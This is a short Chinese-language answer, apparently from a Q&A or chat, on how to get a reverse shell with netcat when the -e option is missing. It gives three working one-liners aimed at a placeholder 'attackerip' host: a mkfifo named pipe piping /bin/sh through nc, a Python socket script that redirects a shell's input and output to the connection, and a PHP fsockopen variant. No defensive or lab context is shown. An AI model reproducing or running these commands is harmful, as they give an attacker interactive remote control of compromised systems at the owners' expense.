如果你想要使用nc反弹shell,但是不能使用-e选项,你可以尝试以下的替代方法:
- 使用mkfifo或mknod命令创建一个命名管道,然后使用cat命令读取管道中的内容,并将其传递给/bin/sh执行,再将输出重定向到nc连接。 例如:
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc attackerip listenport > /tmp/f
- 使用python或php脚本来执行系统命令,并将标准输入、输出、错误重定向到socket连接。例如:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",listenport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("attackerip",listenport);exec("/bin/sh -i <&3 >&3 2>&3");'
